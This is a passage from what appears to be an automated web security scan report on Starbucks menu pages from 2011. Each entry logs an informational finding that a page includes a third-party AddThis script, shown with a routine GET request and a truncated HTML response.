GET /menu/food/ice-cream/java-chip-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:42 GMT
Connection: close
Content-Length: 38726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.246. http://www.starbucks.com/menu/food/ice-cream/mocha-frappuccino-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/mocha-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/mocha-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:01 GMT
Connection: close
Content-Length: 38642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.247. http://www.starbucks.com/menu/food/ice-cream/peppermint-mocha-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/peppermint-mocha-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/peppermint-mocha-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:50 GMT
Connection: close
Content-Length: 38633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.248. http://www.starbucks.com/menu/food/ice-cream/signature-hot-chocolate-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/signature-hot-chocolate-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/signature-hot-chocolate-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:49 GMT
Connection: close
Content-Length: 38774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.249. http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:15 GMT
Connection: close
Content-Length: 38913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.250. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:15 GMT
Connection: close
Content-Length: 38703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.251. http://www.starbucks.com/menu/food/salads/farmers-market-salad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/farmers-market-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/farmers-market-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:36 GMT
Connection: close
Content-Length: 41155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.252. http://www.starbucks.com/menu/food/salads/fruit-cup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/fruit-cup HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:31 GMT
Connection: close
Content-Length: 40228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.253. http://www.starbucks.com/menu/food/salads/garden-pesto-salad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/garden-pesto-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/garden-pesto-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:37 GMT
Connection: close
Content-Length: 38406

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.254. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/salads/picnic-pasta-salad HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:55:53 GMT
Connection: close
Content-Length: 41163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.255. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:13 GMT
Connection: close
Content-Length: 42573

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.256. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:56:38 GMT
Connection: close
Content-Length: 42100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.257. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:15 GMT
Connection: close
Content-Length: 42071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.258. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:09 GMT
Connection: close
Content-Length: 42628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.259. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:57:38 GMT
Connection: close
Content-Length: 43164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.260. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:58:02 GMT
Connection: close
Content-Length: 42289

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.261. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/dark-cherry-yogurt-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/dark-cherry-yogurt-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:21 GMT
Connection: close
Content-Length: 41253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.262. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/greek-yogurt-honey-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/greek-yogurt-honey-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:30 GMT
Connection: close
Content-Length: 41009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.263. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:33 GMT
Connection: close
Content-Length: 41003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.264. http://www.starbucks.com/menu/nutrition

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/nutrition

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/nutrition HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:48 GMT
Connection: close
Content-Length: 49305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

